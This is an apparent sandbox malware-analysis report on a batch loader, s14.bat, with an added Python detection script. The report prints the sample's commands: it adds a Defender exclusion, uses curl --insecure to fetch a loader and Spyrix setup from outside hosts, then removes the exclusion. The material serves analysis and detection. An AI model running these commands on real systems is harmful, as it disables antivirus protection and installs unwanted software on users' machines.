Windows Analysis Report
s14.bat

Overview

General Information

Sample name: s14.bat
Analysis ID: 1523868
MD5: db54c87742c96b03caeb3774ecb51438
SHA1: f6a559b83cbc3b82cb0a5c2acb64b6d4038cb593
SHA256: 634c59030c60c10818f142277376c9ba06d14110f41e544f6f3bae822352d0b9
Tags: batfiledn-comuser-JAMESWT_MHT

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • cmd.exe (PID: 6336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 4600 cmdline: reg query "HKU\S-1-5-19\Environment" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • powershell.exe (PID: 4296 cmdline: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • curl.exe (PID: 7656 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • curl.exe (PID: 7688 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • timeout.exe (PID: 7704 cmdline: timeout 10 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • curl.exe (PID: 7832 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • timeout.exe (PID: 7852 cmdline: timeout 10 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • curl.exe (PID: 7912 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • powershell.exe (PID: 7928 cmdline: powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Rule authors (five matches on the same event): Florian Roth (Nextron Systems); Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Florian Roth (Nextron Systems); frack113, Nasreddine Bencherchali; Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6336, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", ProcessId: 4296, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 87.7% probability
Source: unknown | HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /loader/link.php?prg_id=sfk HTTP/1.1 Host: cdnbaynet.com User-Agent: sfk-dst-loader-2.0 Accept: */*
Source: global traffic | DNS traffic detected: DNS query: cdnbaynet.com
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: classification engine | Classification label: mal60.evad.winBAT@20/17@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user~1\AppData\Local\Temp\s14
Source: C:\Windows\System32\reg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 10
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 10
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
Source: C:\Windows\System32\cmd.exe | Sections loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\curl.exe | Sections loaded: secur32.dll, sspicli.dll, iphlpapi.dll, mswsock.dll, kernel.appcore.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\System32\curl.exe | Sections loaded: secur32.dll, sspicli.dll, iphlpapi.dll, kernel.appcore.dll
Source: C:\Windows\System32\timeout.exe | Sections loaded: version.dll
Source: C:\Windows\System32\curl.exe | Sections loaded: secur32.dll, sspicli.dll, iphlpapi.dll, kernel.appcore.dll
Source: C:\Windows\System32\timeout.exe | Sections loaded: version.dll
Source: C:\Windows\System32\curl.exe | Sections loaded: secur32.dll, sspicli.dll, iphlpapi.dll, kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4800
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2141
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296 | Thread sleep count: 4800 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296 | Thread sleep count: 5010 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244 | Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 7708 | Thread sleep count: 85 > 30
Source: C:\Windows\System32\timeout.exe TID: 7856 | Thread sleep count: 84 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976 | Thread sleep count: 7424 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980 | Thread sleep count: 2141 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: curl.exe, 00000011.00000002.1526338394.000001E7C1BA1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: curl.exe, 0000000D.00000003.1424929417.000001C1E4543000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1425917834.000001C9F6163000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 10
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 10
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
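The process sequence above is the detection-relevant chain: a Defender exclusion is added for a directory under %TEMP% (using the 8.3 short name user~1), payloads are fetched into that directory with curl --insecure (certificate verification off), and the exclusion is removed again once the downloads are done. As an added example that is not part of the Joe Sandbox report and not the sample's own code, the following Python applies that logic to Sysmon-style process creation records. The command lines are the ones listed above; the timestamps (seconds since the batch file started) and the PIDs 1000, 7700 and 7900 are constructed for the example.

```python
import re

# Constructed Sysmon-style process creation records. The command lines are the
# ones the report lists above; the timestamps and the PIDs 1000, 7700 and 7900
# are assumptions for this example, not values from the sandbox log.
SAMPLE_EVENTS = [
    {"ts": 0, "pid": 6336, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" "'},
    {"ts": 1, "pid": 4600, "ppid": 6336, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r'reg query "HKU\S-1-5-19\Environment"'},
    {"ts": 2, "pid": 4296, "ppid": 6336,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"'''},
    {"ts": 5, "pid": 7656, "ppid": 6336, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r'curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk'},
    {"ts": 7, "pid": 7700, "ppid": 6336, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r'curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe'},
    {"ts": 8, "pid": 7708, "ppid": 6336, "image": r"C:\Windows\System32\timeout.exe",
     "cmd": "timeout 10"},
    {"ts": 40, "pid": 7900, "ppid": 6336,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"'''},
]

# Add/Set/Remove-MpPreference with an exclusion parameter. The value may be wrapped
# in the "'...'" double quoting this sample uses (cmd.exe passes both quote kinds through).
MPPREF_RE = re.compile(
    r"(add|set|remove)-mppreference\b.*?-exclusion(path|process|extension)\s+[\"']*([^\"']+)",
    re.IGNORECASE)
# curl output target: -o/--output followed by a quoted or bare path
CURL_OUT_RE = re.compile(r'(?:^|\s)(?:-o|--output)\s+(?:"([^"]*)"|(\S+))')
# curl with certificate verification disabled
INSECURE_RE = re.compile(r"(?:^|\s)(?:--insecure|-k)(?:\s|$)")
# 8.3 short-name component such as user~1\ (defeats naive matching on the long name)
SHORTNAME_RE = re.compile(r"~\d+(?:\\|$)")
TEMP_MARKER = "\\appdata\\local\\temp\\"


def norm_path(path):
    """Lower-case and drop a trailing separator so 'X\\' and 'X' compare equal."""
    return path.strip().rstrip("\\").lower()


def output_dir(path):
    """Directory a curl -o target lands in; a target ending in '\\' (empty file
    name, as in the second download above) names the directory itself."""
    if path.endswith("\\"):
        return norm_path(path)
    n = norm_path(path)
    return n.rsplit("\\", 1)[0] if "\\" in n else ""


def is_under(path, root):
    return path == root or path.startswith(root + "\\")


def analyse(events):
    """Walk process creation events in time order and return (rule, pid, detail)
    findings for the exclusion -> insecure download -> exclusion removal chain."""
    findings = []
    active = {}  # normalised excluded path -> ts when the exclusion was added
    for ev in sorted(events, key=lambda e: e["ts"]):
        cmd, image = ev["cmd"], ev["image"].lower()
        m = MPPREF_RE.search(cmd)
        if m and image.endswith("powershell.exe"):
            verb, kind, target = m.group(1).lower(), m.group(2).lower(), norm_path(m.group(3))
            if verb in ("add", "set"):
                active[target] = ev["ts"]
                findings.append(("defender_exclusion_added", ev["pid"], f"{kind}={target}"))
                if SHORTNAME_RE.search(target):
                    findings.append(("short_name_path", ev["pid"], target))
                if TEMP_MARKER in target + "\\":
                    findings.append(("temp_dir_excluded", ev["pid"], target))
            elif verb == "remove" and target in active:
                lifetime = ev["ts"] - active.pop(target)
                findings.append(("exclusion_removed", ev["pid"], f"{target} lived {lifetime}s"))
        elif image.endswith("curl.exe"):
            if INSECURE_RE.search(cmd):
                findings.append(("curl_tls_verification_disabled", ev["pid"], cmd.split()[-1]))
            om = CURL_OUT_RE.search(cmd)
            dest = (om.group(1) if om.group(1) is not None else om.group(2)) if om else ""
            hit = [root for root in active if is_under(output_dir(dest), root)]
            if hit:
                findings.append(("download_into_excluded_dir", ev["pid"], f"{dest} under {hit[0]}"))
    return findings


def exclusion_abuse_chain(findings):
    """True when an exclusion was added, something was downloaded into it, and the
    exclusion was removed again: the cover-your-tracks pattern this sample shows."""
    rules = {r for r, _, _ in findings}
    return {"defender_exclusion_added", "download_into_excluded_dir", "exclusion_removed"} <= rules


if __name__ == "__main__":
    for rule, pid, detail in analyse(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid} {detail}")
    print("chain:", exclusion_abuse_chain(analyse(SAMPLE_EVENTS)))
```

Paths are compared after normalisation, so the 8.3 form in the command line and the trailing backslash of the second download (an empty file name, exactly as the report shows it) both resolve to the excluded directory; a production rule should additionally expand short names with GetLongPathName, since the exclusion Defender stores is the long form. Command-line capture is only one of the two telemetry sources: the Defender operational log records the exclusion change independently (event 5007, configuration changed), which still fires if the PowerShell command line is obfuscated or encoded.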
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
MITRE ATT&CK matrix, listed per tactic (the digits the report places in front of a technique name are kept in brackets; entries without brackets carry no count in the report):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Scripting [1]; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd
Persistence: Scripting [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection [11]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Disable or Modify Tools [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [21]; Process Injection [11]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
